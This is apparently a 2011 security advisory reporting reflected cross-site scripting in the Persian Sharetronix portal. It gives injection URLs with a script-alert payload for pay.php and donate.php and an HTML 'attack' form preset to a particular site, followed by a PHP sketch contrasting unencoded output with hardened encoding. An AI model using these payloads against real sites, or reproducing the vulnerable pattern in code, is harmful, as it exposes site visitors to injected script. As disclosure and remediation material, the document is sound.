Persian Sharetronix Portal Cross Site Scripting

2011.08.06
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

===========================================================
Persian Sharetronix portal Cross Site Scripting Vulnerability
-----------------------------------------------------------
found by : kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script name: Persian Sharetronix
download: http://donbaler.com/i/upload/2/1311602963.zip
-----------------------------------------------------------
Exploit:
--------
Example:
-------
www.site /tools/pay.php?product_name="><script>alert(888)</script>
www.site /tools/donate.php?product_name="><script>alert(888)</script>
---------------------------------------------
PoC:
---------------------------------------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>BY KURD-TEAM</title>
<script language="JavaScript">
function it(){
xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+xpl.xss.value;xpl.submit();
}
</script>
</head>
<body bgcolor="#000000">
<div id="footer">
<div class="left">
<a title="Persian Sharetronix ? &#1608;&#1576;&#1604;&#1575;&#1711;" href="http://sharetronix.ir/blog">
<span style="text-decoration: none"><font size="4" color="#FF3300">
Persian Sharetronix</font><font size="4"></font></span></a><font size="4" color="#FF3300">
portal Cross Site Scripting Vulnerability</font></div>
</div>
<p align="left"><font color="#0000FF">-----------------------------------</font></p>
<form method="post" name="xpl" onSubmit="it();">
<p align="left">
<font size="2" face="Tahoma">
<font color="#FFFFFF">victim:</font>
<input type="text" name="victim" size="33";" style="color: #FFFFFF; background-color: #000000" value="http://donbaler.net">
<font color="#FFFFFF">path:</font>
<input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/tools/"><font color="#FFFFFF">
file: </font>
<input type="text" name="file" size="28";" style="color: #FFFFFF; background-color: #000000" value="pay.php?product_name=">
</font>
</p>
<p align="left">
<font size="2" face="Tahoma">
<font color="#FFFFFF">XSS:</font>
<input type="text" name="xss" size="34";" style="color: #FFFFFF; background-color: #000000" value="&quot;&gt;&lt;script&gt;alert(888)&lt;/script&gt;">
</p>
</p>
<center>
</p>
<p><input type="submit" value="attack" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</center>
<font color="#0000FF">------------------------------------------</font></body></body>
</html>
---------------------------------------------------------------------------
Zryan_kurd , AhMaD-HaWLeRY
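
Mitigation sketch, added here as an example and not taken from the advisory or from the Sharetronix source: the hypothetical "before" next to a hardened form of the reflection in /tools/pay.php and /tools/donate.php. It assumes, from the "> prefix of the test string, that product_name is echoed into a double-quoted HTML attribute; the function names, the input markup and the 200-byte limit are hypothetical.

```php
<?php
// Added example, not Sharetronix code. Assumption: product_name is echoed
// inside a double-quoted HTML attribute, which is why the advisory's test
// string begins with "> (it closes the attribute, then the tag).
declare(strict_types=1);

// Hypothetical "before": the request value is concatenated in unencoded.
function render_field_vulnerable(string $productName): string
{
    return '<input type="hidden" name="product_name" value="' . $productName . '">';
}

// Hardened form: bound the input, then encode for the attribute context.
function render_field_hardened(string $productName): string
{
    if (strlen($productName) > 200) {   // assumed limit for a product name
        $productName = '';
    }
    // ENT_QUOTES encodes " and ' as well as < > &; ENT_SUBSTITUTE replaces
    // invalid UTF-8 sequences instead of returning an empty string.
    $safe = htmlspecialchars($productName, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="product_name" value="' . $safe . '">';
}

// Constructed default so the file also runs from the CLI: the advisory's string.
$input = $_GET['product_name'] ?? '"><script>alert(888)</script>';
if (!is_string($input)) {               // product_name[]=x arrives as an array
    $input = '';
}

header('Content-Type: text/html; charset=UTF-8');
// Defence in depth: inline <script> is refused even if an encoding call is missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");

echo render_field_hardened($input), "\n";
```

The same encoding has to be applied at every place the parameter is written into the page, in both pay.php and donate.php.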



Copyright 2024, cxsecurity.com

 
